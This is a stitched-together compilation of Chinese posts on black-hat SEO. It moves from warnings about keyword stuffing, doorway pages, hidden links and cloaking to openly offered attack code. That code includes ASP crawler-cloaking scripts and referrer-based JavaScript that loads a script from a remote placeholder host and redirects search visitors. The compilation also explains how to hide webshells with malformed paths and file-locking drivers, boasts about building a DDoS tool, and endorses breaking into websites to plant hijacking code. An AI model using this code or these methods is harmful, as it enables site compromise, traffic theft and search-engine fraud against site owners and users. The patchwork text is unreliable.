    1). 标题描述标签中堆砌关键词:
  众所周知,标题是SEO中比较重要的一个部分,很多人将大量的关键地都堆砌在标题中,例如“SEO-seo培训-SEO服务-SEO优化-seo顾问-SEO教程-SEO排名”,这种写法算是堆砌的比较轻微的,有的人甚至会堆砌几十个类似的关键词,如果将这种文字都放入标题中,则就形成了对SEO这个词的堆砌。建议标题中相同关键词出现的次数最多不要超过3次。

    2).网页中堆砌关键词:
  大家也许知道,关键词的密度直接影响了这个关键词在搜索引擎中的排名,关键词密度越高,则说明这个关键词在该网页中的重要性越大,所以SEO行业内有个名词叫做“关键词布局”,但是黑帽seo人员,只为了提高关键词的密度,而在网页中将关键词乱堆一气。

    3).ALT标签堆砌关键词
    在ALT标签的关键字堆砌(例如标签附加到图像)可能看起来是这样的:

关键词

   黑帽SEO作弊手法二:桥页

所谓桥页,也叫:门页、跳页、过渡页,桥页通常是针对特定的关键字词组或短语,用软件自动生成大量低质量包含关键词的网页,然后从这些网页做自动转向到主页。目的是希望这些以不同关键词为目标的桥页在搜索引擎中得到好的排名。当用户点击搜索结果的时候,会自动转到主页。有的时候是在桥页上放上一个通往主页的链接,而不自动转向。桥页包括多个链接(往往是数百个),对访问者用处极小或无用,不包含有价值的内容。桥页生成的文字往往是杂乱无章的,没有什么逻辑。如果是由人写出来的真正包含关键词的文章,就不是桥页了。

解释下如A页是桥页,B页是网站。如果访问A页那么弹出B页,搜索引擎会根据用户停留在A页的事情来判断A页是不是桥页。现在的搜索引擎越来越智能了。搜索引擎惩罚的话,从道理上将应该是惩罚A页。如果惩罚B页的话,那么会有无数的无辜网站会遭到恶意竞争对手的桥页“攻击”。

桥页和门页这个是以前时常涌现的黑帽方法之一,当做优化的时候,桥页都会专门做一个页面,全体嵌入关键词,并且关键词全部加粗加超链接到首页,就是为了可以提高关键词呈现率,并且快捷的剪刀后果,这个方法比拟快,但是搜索引擎也会对这样的网站进行查封。

桥页这种手法在07、08年前较为盛行。主要是针对百度而言,谷歌由于有Google toolbar,因此他是可以通过广泛的统计分析,来确定用户的在A页的停留时间,从而判断A页是桥页的概率。百度在这方面就稍逊,因此采用人工干预处理也就是不得已而为之的办法了。

   黑帽SEO作弊手法三:隐藏文字

 隐藏文字是在网页的HTML文件中放上含有关键词的文字,但这些字不能被用户所看到,只能被搜索引擎看到。

隐藏文字的方法可以有几种形式:比如颜色隐藏:通过将文字与背景设置为相同颜色,达到隐藏的效果;DIV隐藏链接;javascript隐藏链接;静态页面黑链代码;CSS隐藏链接代码(挂黑链常用此手段);小字号隐藏:将文字大小设置为1的细微文字或微型文字,并且放在不起眼的角落,用户很难察觉到,而搜索引擎却可以正常读取到。

隐藏关键词的目的就是为了增加页面关键词的密度,想提高网页的相关性,以达到优化的效果,。有的时候,有的人还在这些地方放上与网站内容无关的,但是很热门的关键词,希望网页能在这些热门关键词下得到好的排名和流量。

隐藏文字说白了就是欺骗搜索引擎,现在的搜索引擎已经能轻易的识别这些技术,网站一但被搜索引擎发现隐藏堆砌关键字,轻则降权重,重则网站直接被K被屏蔽。

隐藏文字这也是常用的作弊方式,通常是某些黑客常用的方式,入侵某个网站后,为了不让管理员发现,便把文字的颜色和网页的seo关键字排名优化颜色设置成一致,用肉眼无法看出,只让搜素引擎看见而让浏览者看不见。

   黑帽SEO作弊手法四:隐藏链接(黑链)

 隐藏链接,通常也被称之为黑链;指的是正常的链接通过一些方法,如:把链接放入js代码中,使用display:none等等,从而使用户在正常浏览网页的时候无法看到这个链接。

隐藏链接和隐藏文字(hidden text)相似,但是区别是把关键词放在链接里面,而这个链接也是用户所看不到的。

新手站长在跟其它网站交换链接的时候,可能会被蒙蔽,有的站长在给对方做友情链接的时候通过使用CSS来控制隐藏链接的方式也不少见,也有部份人通过提供免费的网站程序,博客风格,网站插件等方法把黑链植入到你的网站。

随着现在友情链接交易平台的盛行,不少无良的“黑客”或服务器管理人员,开始通过挂黑链的方式为自己谋利。黑链是通过技术手段扫描FTP和服务器的弱口令,网站漏洞,获取对方网站的管理权限,然后黑掉网站,在网页中添加指向自己网站的隐形锚文本连接挂进,从而快速提升网站排名。这手法一般在网站前台是无法看到的,只能通过查看源代码才能发现,一般是用CSS隐藏,也有用JS输出CSS。

我们知道百度排名算法中有一个很重要的因素就是基于超链接分析技术,当一个站点被越多的站点给链接的时候,那么这个站点的权重也会相对随之提升的,但是这并不包括隐藏链接这种手段所带来的链接数量,因为隐藏链接在搜索引擎看来是一种欺骗手段,所以必定会影响一个站点的权重正常传递。搜索引擎谷歌和百度早就提出,搜索引擎是不欢迎黑链的,隐藏链接是被搜索引擎严令禁止的,一旦发现,惩罚将会非常严重,轻则降低网页权重,严重甚至拔毛K站。所以新手站长在跟对方交换友情链接成功后,也要看下对方网站给您交换链接对应的HTML源代码是否正常。假如说你的网站当前做了隐藏链接,建议你把隐蔽链接去掉,以免搜索引擎发现k掉你的网站。

黑链在线检测:http://tools.adyun.com/glink

黑链在线检测

   黑帽SEO作弊手法五:隐藏页面

隐藏页面也叫斗蓬法,是专门针对搜索引擎在爬取网站页面时显示的经过特别优化的页面,指有的网页使用程序或脚本来检测来访问的是搜索引擎还是普通用户。通过在服务器上设置cloaked页面来读取和判断当前访问者是真实的访问者还是搜索引擎蜘蛛,然后根据服务器配置好的脚本有针对性的给予真实访问者和搜索引擎蜘蛛作出响应,给予对应的返回页面展示。如果是搜索引擎,网页就返回经过优化的网页版本。如果来访的是普通人,返回的是另外一个版本。

隐藏页面也是一种障眼法,为SEO作弊手段之一,这种手法意图蒙骗搜索引擎,来影响该网站的网页在搜索引擎中获取较好的排名,通常用户无法发现。因为一旦你的浏览器去看这个网页,无论是在页面上还是在HTML源文件中,你所得到的都已经是与搜索引擎看到的不同的版本。检测的方法是,看一下这个网页的快照。隐藏页面手法如被发现,该网站会永暂从搜索引擎名单中被剔除。

   黑帽SEO作弊手法六:网页劫持

网页劫持也就是我们经常所说的page jacking,是将别人的网站内容或者整个网站全面复制下来,偷梁换柱放在自己的网站上。而欺骗性重定向,鬼域与其类似。

这种黑帽SEO手法对网页内容极其匮乏的站长是有吸引力的。但是,这个做法是相当冒险的,更是为人所不齿的。搜索引擎的专利技术能从多个因素上来判断这个被复制的网页或网站不是原创,而不予以收录。这种做法已经被google左侧排名优化搜索引擎从多个方面来判断重复网页是不是原创,所以这种网页劫持的方式用的也越来越少。

网页劫持

PR劫持使用欺骗手段获得工具条上比较高的PR显示。方式是利用301和302定向的功能。从域名A走301或302转向到域名B,而域名B的PR值较高,域名A在PR更新后,也会显示域名B的PR值。有人就利用这一点,把自己的域名PR值刻意提高。

爱站网-真假PR值查询:http://pr.aizhan.com/

真假PR值查询

黑帽SEO作弊手法其他的手法,将在后面的篇节中陆续为大家介绍。敬请关注<<远离黑帽-揭露网上流行的18种黑帽SEO作弊手法(中)>>!

    搜索在进步,算法常变术;作弊有风险,黑帽须谨慎!切勿踩红线,提高站质量。

    做网站的秘诀在于坚持! 最高明的SEO就是忘却优化痕迹, 做好文章质量,提高用户体验。每天更新,以不变应万变,才是制胜不二的法宝。

    本文由上海SEO潇然孤雁飞编辑整理 文章来源:潇然孤雁飞SEO博客,http://www.xlfseo.com/post/HM-1.html欢迎转载!转载请注明出处,谢谢!

解密:百度快照劫持案例—蜘蛛劫持代码公开!

我想大家早已经看到如:时时彩平台  百度快照劫持案例了吧。

我还没落伍上不了图

连接地址:http://www.baidu.com/s?wd=%CA%B1%CA%B1%B2%CA%C6%BD%CC%A8&rsv_bp=0&rsv_spt=3&inputT=3474

通过百度点击排名第一的站,我们看到的是一个时时彩宣传页面。如果直接在浏览器输入显示的则是这个站本来的程序。

通过查看源码我们看不到heike是用什么代码实现的这效果。隐藏性很高。

如果哪位兄弟姐妹 对此有兴趣,请给我一点积分。谢谢。我就差6个积分。

这个代码是在百度或者谷歌蜘蛛来抓取的时候自动判断。

废话不多说,直接贡上代码:

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Frameset//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd“>

<html xmlns=”http://www.w3.org/1999/xhtml“>

<head>

<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />

<title>无标题文档</title>

<% 定义方法函数

function Getbot()

dim s_agent

GetBot=””

s_agent=Request.ServerVariables(“HTTP_USER_AGENT”)

if instr(1,s_agent,”googlebot”,1) > 0 then

GetBot=”google”

end if

if instr(1,s_agent,”baiduspider”,1) > 0 then

GetBot=”baidu”

end if

end function

%>

<style type=”text/css”>

<!–

.STYLE1 {color: #FF0000}

–>

</style>

</head>

<body>

<table width=”751″ height=”512″>

<tr>

<td height=”132″ bgcolor=”#00CCFF”><div align=”center”>网页头文件(可以是导航栏、图片获其他内容)</div></td>

</tr>

<tr><td height=”311″>网页内容部分</td>

</tr>

<%

if GetBot=”baidu” or GetBot=”google” then

Response.Write “<a href=’http://www.tengtongtie.com‘>(友链一)膏药</a><a href=’http://www.tengtongtie.com‘>(友链二)黑膏药</a>”

else

Response.Write”不做处理,或输出任意”

end if

%>

<tr><td bgcolor=”#CCCCCC”><div align=”center”>友情链接部分</div></td>

</tr>

</table>

</body>

</noframes></html>

搜索引擎劫持网站流量核心技术 劫持流量

发现最近现在许多敏感的关键词都能出现在百度首页,打开后立刻跳转到另一个网站去,如果在浏览器的地址栏里输入原网站的网址却能浏览这个正规网站。这就是网站被攻击劫持了网站通过百度来的流量,谷歌不受影响。

一般通过以上手段来流量的有2种行为:

第一:正规站没流量和排名,不敢用黑链和黑帽,做垃圾站通过黑链和黑帽技术把核心关键词短时间做到百度首页,通过跳转到正规站来给正规站带来流量,这是主动才做行为。

第二:一个正规站的关键词排名在百度前面,这些正规网站权重比较高,排名也比较靠前,通过非法植入网站程序,让搜索引擎来的流量跳转到自己正规站上面,手动输入则不会跳转,然而蜘蛛也会抓取该非法网站,并且误以为属于这个正规网站,于是照常收录,流量来的则是别人的正规站的流量,导致非法网站排名不断提高。

GIF89a=””;

var d=document.referrer;

if ((d.indexOf(“%C6%F7″)>0)||(d.indexOf(“%C6%F7″)>0)||(d.indexOf(“%C6%F7″)>0)){

document.writeln(“<script src=http:\/\/www.xxx.xxx\/webpic\/W0200208\/brrt.gif><\/script>”);

}

else{

window.location.href=”index.asp”

}

以上这段代码显示通过HTTP Referrer来判断用户是从哪里来的。如果是用户手动输入的,则打开网站原来的index.asp页面;如果来自百度搜索,那就跳转到另一个文件。

var d=document.referrer;

if (d.indexOf(“%CC%FD”)>0 ||d.indexOf(“%C6%F7″)>0) {

self.location=http://www.xxx.xxx/;

window.opener.location=http://www.xxx.xxx/

};

这个文件里的代码在做判断,如果来自百度搜索结果,那就跳转到非法网站去,否则就不做操作。

但是JS打开页面,载入时,实在太慢,而且JS文件占带宽。

现在考虑如果用ASP怎么来判断。

现在用asp 编写。

<%

Dim from

from=Request.ServerVariables(“HTTP_REFERER”)

If from<>”” Then

Response.Redirect(“http://www.xxx.xxx/list/index.html”)

Response.End()

End If

%>

各种隐藏 WebShell、创建、删除畸形目录、特殊文件名、黑帽SEO作弊

转自:http://lcx.cc/?i=2416

各种隐藏 WebShell、创建、删除畸形目录、特殊文件名、黑帽SEO作弊

——————————————————————————–

前两天在乌云看到一个帖子,地址:http://zone.wooyun.org/index.php?do=view&id=55

——————————————————————————–

以上回复没有一个正确的,都是不知所云,乱回复一通,晕……

可见各位白帽子对黑产知之甚少啊……

其实这个问题,经常有朋友问我,我也都帮大家解决了……

但是现在这些现象越来越严重,而且手法毒辣、隐蔽、变态,清除了又来了,删掉了又恢复了,最后直接找不到文件了,但是访问网站还在,急的各大管理员、站长抓耳挠腮、不知所措。

所以我觉得,很有必要写个关于这个的专题文章,彻底剖析原理,揭露真相,也许能帮到各大站长、管理员。

\(^o^)/

正文开始……

——————————————————————————–

本文将全面讲述各种隐藏 WebShell、创建、删除畸形目录、特殊文件名的方法,应该是网上最全、最详细的了……

另外,再大概说一下各种黑帽SEO作弊方法,以帮助广大站长、管理员彻底清理这些文件……

说明,以下操作均以“Windows Server 2003 SP2”做示范,其他系统请自行以此类推。

说到隐藏 WebShell 的方法,从最初的包含图片(#include file=”a.jpg”)、设置文件隐藏属性(Fso 组件可以做到,完全支持),再到较早的畸形目录、特殊文件名(两年前开始流行),或者两者结合使用(例如:c:\a.\aux.txt),直到现在的驱动级隐藏(大约一年半前开始流行),这些小黑客们也算是有一点进步吧……

先扫盲,普及一下相关知识:

——————————————————————————–

畸形目录:

目录名中存在一个或多个 . (点、英文句号)

特殊文件名:

其实是系统设备名,这是 Windows 系统保留的文件名,普通方法无法访问,主要有:lpt,aux,com1-9,prn,nul,con,例如:lpt.txt、com1.txt

驱动级隐藏:

由于这些小黑客们都没有能力编写驱动,所以主要是借助一些第三方软件进行隐藏,例如:Easy File Locker 1.3,如今很流行,底下会详细讲。

其他方法:

循环锁定文件,一两年前曾经很火爆,首先弄一个非木马脚本(不会被杀),只有简单的文件读写功能,然后在一个24小时运行的服务器上,使用程序每隔一秒请求一次该脚本,该脚本每次执行时会检查目标文件(某个挂马或者黑帽SEO的文件)的大小以及属性是否正确,如果不是,那么就删除,然后重写,在设置属性,从而达到“文件锁定”的目的,该方法一般和畸形目录+特殊文件名配合使用。

另类方法:

Aspx 可以打开文件,但不关闭句柄,在此期间该文件就无法删除或修改,有效期直到下次IIS或服务器重启。

如果无法提权,但是支持低权限运行程序,那就可以写一个简单的程序传上去,低权限锁定文件,直到该进程结束或服务器重启,锁定方法可以参考上边的,例如循环监视锁定,或者文件句柄……

——————————————————————————–

以上这些隐藏方法,如今已经被大量应用到黑帽 Seo、挂马、关键词优化等非法活动中了,各大站长、管理员深受其害……

畸形目录、特殊文件名的创建、删除方法都很简单:

——————————————————————————–

畸形目录:

只需要记住将一个点换成两个点就行了,例如:

创建一个“a..”目录:md c:\a..\,实际显示为:c:\a.\,普通方法无法访问,以此类推,也可以为多个点……

删除的方法也一样:rd /s /q c:\a..\

特殊文件名:

稍微复杂点,普通的路径访问是无法访问的,需要用这种方式的路径:\\.\c:\aux.txt 或 \\?\c:\aux.txt 或 \\计算机名\c:\aux.txt(网上邻居形式的路径),例如:

创建一个文件:echo hello>\\.\c:\aux.txt

读取该文件内容:type \\.\c:\aux.txt

删除该文件:del /f /q /a \\.\c:\com1.txt

很简单,是吧,好的,现在我们挑战更复杂一点的……

畸形目录 + 特殊文件名:

创建:

md c:\a..\

echo hello>\\.\c:\a..\aux.txt

读取:

type \\.\c:\a..\aux.txt

删除的方法已经不能用刚才的了,需要这样:

rd /s /q \\.\c:\a..\

(还有些其他的特殊路径,可以参考:带点文件夹的创建与删除【技巧】名字带“\”文件夹的创建与删除 )

——————————————————————————–

很好,现在,你已经学会了如何处理这种目录、文件了,以上的操作,Asp 使用 Fso 组件完全可以做到,完全支持这种路径,也就是说普通的 WebShell 权限就可以完成了……

\(^o^)/

至于“其他方法”和“另类方法”的清理就比较简单了,例如:

其他方法:

找出可疑脚本,然后删除即可,可以搜索关键词,例如 Asp 中的:FSO、FileSystemObject、OpenTextFile、CreateTextFile、CopyFile、DeleteFile、.Write 等……

其实最简单的方法是查看IIS日志,看那个文件被频繁大量请求,然后找出该文件,然后你懂的……

此方法经常配合畸形目录、特殊文件名、包含图片等结合使用,使用刚才讲过的方法清理即可。

另类方法:

比较简单了,找出可疑进程,最明显的是用户名是IIS的账户,结束掉,然后删除该文件。

最后重启 IIS 即可,各种锁定文件句柄的方法统统会失效,或者干脆重启服务器。

再提一下,一般,一个有价值的网站,他们不会轻易放弃的,会留下一堆后门,各种文件中插入一句话,保留原来的漏洞或者人为的制造一个漏洞,即使所有后门都被清理,依旧可以拿下!

而且还会定期检查,有人还使用软件24小时监控挂马的页面,每秒一次,发现不存在某个关键词就报警,然后攻击者就上去恢复,这也是为什么删了又会出现,删不干净的原因……

如果已经遭到提权的话,系统可能已经中了一堆木马,各种“粘滞键后门”、“放大键后门”、“Win+U后门”、“隐藏、克隆账户”、“触发式后门”等……

所以,你事后需要要全面检查下系统了,不要忘记检查杀毒软件的白名单,你懂的……

进行这些操作,我本人推荐使用手工杀毒工具“PowerTool v4.2”、“XueTr v0.45”,在文章的最后我会写上官方下载地址。

使用这两个软件要注意下,它们使用的驱动兼容性很差,有比较大的几率会造成系统蓝屏,所以如果您的机器不支持在线重启的话,您可要掂量好再用,希望他们以后的版本能改进下……

——————————————————————————–

说到驱动隐藏,最典型的现象就是系统盘及系统目录中存在以下文件:

c:\Program Files\Easy File Locker
c:\Program Files\Easy File Locker\FileLocker.exe
c:\Program Files\Easy File Locker\uninst.exe
c:\Documents and Settings\Administrator\桌面\Easy File Locker.lnk
c:\Documents and Settings\Administrator\「开始」菜单\程序\Easy File Locker
c:\Documents and Settings\Administrator\「开始」菜单\程序\Easy File Locker\Easy File Locker.lnk
c:\Documents and Settings\Administrator\「开始」菜单\程序\Easy File Locker\Uninstall.lnk

↑ 以上文件十有八九已被攻击者删除(管理员想破脑袋,都不知道怎嘛回事),但以下文件是绝对存在的! ↓

c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys

该软件名字叫:Easy File Locker,一般用 Easy File Locker 1.3,或着是其它版本,你可以搜一下,网上一堆……

功能很简单,简单的驱动隐藏文件(简单的 C、C++ 就可以实现,网上大量源码),支持单个文件或者整个目录。

支持设置访问权限,属性为:可读/可访问(Accessible)、可写(Writable)、可删除(Deletable)、可见(Visible)

一般做黑链的小朋友都会这样设置:只勾选可读,其他的一律拒绝……

那么,会有这样的效果,该文件不会显示,不能通过列目录列出来,也不能删除,除非你知道完整路径,你才可以读取文件内容。

这也是为什么各位管理员头疼的地方了,愣是找不到文件,但是直接访问网站却是可以执行的……

╮(╯_╰)╭

并且该软件还可以设置密码,启动、修改设置、卸载及重复安装的时候都需要密码,更蛋疼的是,主界面、卸载程序等都可以删除,只留下核心的驱动文件就行了……

可以做到无进程、无启动项,无任何异常,因为只加载了一个驱动……

这也是很多管理员想破头都不知道怎吗回事的原因……

说完他的原理、特性,我们再讲讲清除它的方法(不管有没有密码):

首先设置系统“显示隐藏文件”,步骤如下:

1、随意打开一个文件夹、磁盘

2、在文件浏览窗口,依次点击:工具(顶部菜单) –> 文件夹选项 –> 查看(顶部选项卡)

3、依次勾选或点选,设置:隐藏受保护的操作系统文件(不勾选)、显示所有文件和文件夹(选中)、隐藏已知文件类型的扩展名(不勾选),然后点击确定按钮。

提示,如果无法正常选中,例如复选框为灰色、不可操作、勾选无效等现象,说明对应的注册表项已被破坏,可以使用以下注册表代码进行修复:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]

"CheckedValue"=dword:00000001

将以上代码保存为:Fix_Hide_File.Reg(修复隐藏文件),然后双击导入注册表即可。

然后以文本方式可以打开:C:\WINDOWS\xlkfs.ini,这是“Easy File Locker”的配置文件,不出所料的话,你可以看到它的配置信息……

(呵呵,也许会有朋友会问,如果他们连这个文件都隐藏了的话怎么办?很遗憾,该软件不支持隐藏自身的配置文件……)

内容例如:

[Common]
Count=4
[0]
Path=C:\a.txt
Type=0
Access=14
[1]
Path=C:\b.txt
Type=0
Access=14
[2]
Path=C:\c.txt
Type=0
Access=14
[3]
Path=C:\d.txt
Type=0
Access=14

文件、文件夹的路径、设置的权限等一览无余……

注意!!这里记得要把这个文件复制一份单独留着,等会儿清理被隐藏文件的时候要用到!!切记!!!!

然后删除上边所列的所有文件,尤其是系统目录中的那四个文件,如果无法删除可以考虑使用第三方工具强删,然后重启系统。

系统启动后会提示:至少有一个服务或驱动程序无法加载或错误。

这是由于我们删除了那个驱动文件,但是驱动加载项还在,所以会提示加载错误,不理即可。

进入系统后,你会发现隐藏的文件全都回来了,那么,就简单多了,对照你先前备份的那个配置文件,挨个清理即可……

(如果要彻底清除密码,只需要重装该软件,此时不会提示有密码,再卸载即可……)

最后,再检查下杀毒软件白名单中的内容(参考上边的内容进行全面检查,上边说过不再重复),你懂的……

最后再简单的说说黑帽SEO作弊的方法,方便广大站长清理对应的文件。

一般都是劫持百度蜘蛛,很早之前,是在你网站单独放一个脚本文件,该脚本会远程调用攻击者的服务器数据,然后动态显示各种页面,也有少数是把数据库放在你网站,或者干脆生成静态的页面。

然后在你网站的首页(或其他高权重网站)放置一个指向该文件的链接(隐藏的),然后下次蜘蛛抓取的时候,自然会爬向该文件,从而抓取一堆攻击者的预先防止好的数据(通常是生成的垃圾文章堆砌关键词),如果你网站权重够高的话,那么这些关键词会排到较好的位置,从而给攻击者带来巨大的流量,以及很好的经济效益……

(权重:网站的权威性和重要性,相当于谷歌的PR值,是百度对网站评价的一个打分,网站权重越高,那么排名越高、收录越快、越多。)

简单地说,就是在你的网站中生成了一个“小网站”,蜘蛛抓取后,自然会认为是你网站的内容,会按照你网站的权重给于相应的排名。

当有人从百度或者其他搜索引擎点进来的时候,那些脚本会判断来路“Referer: http://www.baidu.com/”,或者直接跳转到攻击者的总页面,从而进行跳转或挂马操作。

当给很多个高权重网站重复以上操作以后,带来的流量就相当可观了,相当于养了一个高权重站群!

而一般政府(gov)、教育(edu)等机构的网站权重都比较高,这也是为什么各路人马都在喊:高价收购政府站、教育站。

这种做法,大约是两三年前的做法,后来做的太疯狂了,百度进行了改版,修改了抓取算法。

导致结果是,他们的数据依然是抓取的,但是会在半个月或者一个月后才放出来快照,然后才给于排名,这大大的影响了黑帽SEO行业,于是新的做法出现了:全局劫持!

什么叫全局劫持?由于百度短时间内不会收录突然冒出来的新链接,所以小黑客们就想到了新的招数:利用网站原有页面进行作弊……

So,邪恶的东西来了:Global.asa、Global.asax,实际上这个方法在很多年前挂马的时候就应用到了。

这两个文件是 Asp 和 Aspx 独有的特殊文件,作用是在每次执行一个动态脚本的时候,都会先加载该脚本,然后再执行目标脚本。

(该文件还可以进行简单的文件锁定,因为每次都先执行嘛,所以可以每次都判断一次某个文件状态,然后进行某些操作,和上边的循环监视锁定的效果是一样的。)

(实际上不一定非要写这俩文件,例如:conn.asp、conn.php 等被大量脚本包含的通用文件都可以,效果是一样的,而且比这个隐蔽多了……)

关于这个文件具体的细节就不说了,不然又是个长篇大论,想了解的可以去搜搜,或者参考:http://baike.baidu.com/view/673542.htm

所以效果就来了,既然执行每个脚本的时候都会先执行该文件,小黑客们就想到了劫持蜘蛛的方法,在 Global.asa 中写判断用户系统信息的代码(User-Agent: Mozilla/5.0),然后判断是否是蜘蛛、来路是什么等信息……

如果是蜘蛛来访,那么就会输出SEO作弊用的关键词,否则就显示正常页面,如果你网站更新频率很高的话,那么几乎是刚挂上关键词就收录了,就来量了,很快。

如果用户来路信息为搜索引擎,那么就跳转到攻击者的页面,否则显示正常页面。

最后造成的影响就是,例如百度:site:lcx.cc,所有原有页面快照都变成了攻击者的关键词(最典型的就是首页了,因为首页快照更新周期短、频率高,而且权重高),然后你点进去就会跳转到另外一个页面(攻击者挂马的页面)……

如果你不是从百度等搜索引擎点进去的,而是直接访问该网站,那是不会有任何异常现象的,所以该方法比较隐蔽……

前几个月新闻媒体疯狂报道的“某某政府网站快照是色情网站、六合彩”等新闻,就是因为这样……

而该方法有个很严重的后果,刚开始SEO作弊带来的访问量很大,然后快照越来越少,最后被K光了,对被挂的网站影响很大,基本是毁了……

如今的SEO作弊方法略有改进,但万变不离其中,高权重网站是必不可少的,修改你网站文件、劫持百度蜘蛛是必不可少的,这里只是略提一下,实际上要复杂得多……

这篇文章基本上算是写完了,各位站长、管理员知道了原理,就可以对症下药了……

最后提供各种提到的软件下载:

(以下地址均为官方网站,可放心下载!)

XueTr v0.45:http://www.xuetr.com/、http://t.qq.com/linxer

PowerTool v4.2:http://hi.baidu.com/ithurricane/blog、http://t.qq.com/powertool

Easy File Locker 1.3:http://www.xoslab.com/

——————————————————————————–

PS:

不要问我为什么很了解这些东西,具体原因你懂的,我很多年前就涉足此行业了,也算是行业中的领头羊了。

当时SEO作弊、黑帽SEO很火爆也很暴力,很疯狂也很赚钱,那个时候做的人基本都赚疯了,一天几万那只能说你做得太小了,当然,当时的技术现在已经全民化了,随便一个小黑客都能做了,不赚钱了,也不好做了……

以上这些文件隐藏、锁定以及市面上所有流行的SEO作弊方法,全部都是那个时候的人们“研发”的……

想当年,各种游戏箱子、全套游戏马统统挂,各种彩票、赌博站、六合彩,互相暴力袭击、各种黑吃黑、最后逼的百度修改抓取算法,百度新出的“该站可能已被入侵”这个提示,就是因为这个行业……

就拿黑吃黑来说,直接入侵对方挂好的站,强行换成自己的文件,然后暴力锁定,把对手踢出去,连续几个通宵不睡觉,抢站,都是很正常的……

为什么抢站?这还用问???流量就是钱啊,挂几个小时就是几千,疯狂的抢,人都疯了,你要一天24小时盯着自己站看被抢没……

一些地区甚至还出现了职业抢站团队,自己不做站,专抢别人挂好的站,把很多没实力的人都“抢死了”,太疯狂了……

碰到拿不下的站,就疯狂DDOS,往死里打!

是的,你猜的没错,著名的电磁风暴便是本人在那个是时期开发的,人挡杀人,佛挡杀佛,神挡屠神!铁蹄踏过,一片焦土!谁敢反抗,灭谁!

还记得当年闲暇时间,没事无聊跑去攻击大型网络游戏、对战平台的机房、服务器,造成全区掉线,以此取乐,挥金如土,当时人都疯了……

这个软件彻底改变了互联网的命运,刷新了DDOS的历史,彻底改变了DDOS的传统模式,掀起了一场DDOS技术革命,以此原型所滋生的软件不计其数,一直火爆至今……

另外一些没有攻击能力的人,就会使用各种手段查找该网站管理员的联系方式,使尽浑身解数联系并举报给该管理员,管理员就会上服务器清理掉,不让我赚钱,你也别想赚钱!!!

太疯狂、太变态、太暴力了,着实印证了那句话,走在世界最前端的人,不是天才,就是疯子!……

如今,我已经不接触黑产了,于是我把它写了出来,这里只是简略的提了一下,实际上比这疯狂的多,按我现在的标准来说的话,这些方法实在是太大众化了,太低级了,早已过时了……

“黑阔们”做seo的方法

今天被强制邀请到一个群。然后群主就一阵广告啊~~~

黑阔们做seo的软件啊。。

批量拿shell,shell加代码 ,百度快照劫持!!。。 牛逼啊

震的我一阵尿颤~~~

 

下图是已经被劫持的百度快照:

http://cache.baidu.com/c?m=9d78d513d9d431ac4f9de3690c66c0176f43f4692ba1d7020fa38449e3732b465017e5ac26520772d6d20d1416de4a4b9b842173471451bd8cbbf85dadbb85585b9f2644676d845662d50ed9cd5155c737912afed918f0cc832592dec5a3af4320cd4474799783f84d0164dd1e860345e9b19939022e1aad9a35728f52605def3441c65088e52518039686d84b3cc93dd11106e6ac22c14e05b463b3691d3337d65bb078465035f73b22e8323a13e49f4ae65a6e3024a139b5aec0c6fc3986cb993b8f8bc9b85be577e7b5fd8874550722ed24cebccbb32a133515d8bac967b225c8f0fbcc4bfe64a0075dca4a06247cb81a83f38d4085144df5977f882f35562b1ddec3638e76671c42bf4f6ca66fc761f6ce284486acdbca881436b284803632e9adc813f4264634ec50174b88e0560044c5113fcb83b328902c19f89556974d0d9c1d415fbff3b48a833aa32d68a90a&p=8b2a9547cad801fe13b7c4710e15d470&user=baidu&fm=sc&query=%B1%BE%CD%F8%D5%BE%B5%C4%D7%CA%C1%CF%C8%AB%B2%BF%C0%B4%D4%B4%D3%DA%BB%A5%C1%AA%CD%F8%2C%C8%E7%B9%FB%C7%D6%B7%B8%C1%CB%D4%AD%D7%F7%D5%DF%B5%C4%C8%A8%C0%FB%C7%EB%D3%EB%CD%F8%D5%BE%B9%DC%C0%ED%D4%B1%C1%AA%CF%B5%A1%A3&qid=ad43d6a80382d21c&p1=41

截图如下:

 

 

从上面的两幅图可以看出来,在这个快照中,上面被插入了另一个网站的内容。。。。

这么做seo果然有点意思。。。。。。

那么我们需要做的就是入侵别人网站,修改别人网页内容,加上第一个图里面的那个判断,并且把百度爬虫爬取的内容部分换成自己的网页内容并且添加大量指向自己网站的链接。牛逼。 就是这么搞

wordpress设置固定链接

处于seo的目的,为了更容易让搜索引擎爬取到,对于网站的每一个网页都设定一个固定链接是最好的选择。

在仪表盘->设置->固定链接,把自定义链接选中,然后,在框框里里面填写:

/%year%/%monthnum%/%day%/%post_id%.html

就可以把固定链接设置成类似于:http://haotuan.us/2012/07/01/116.html 的形式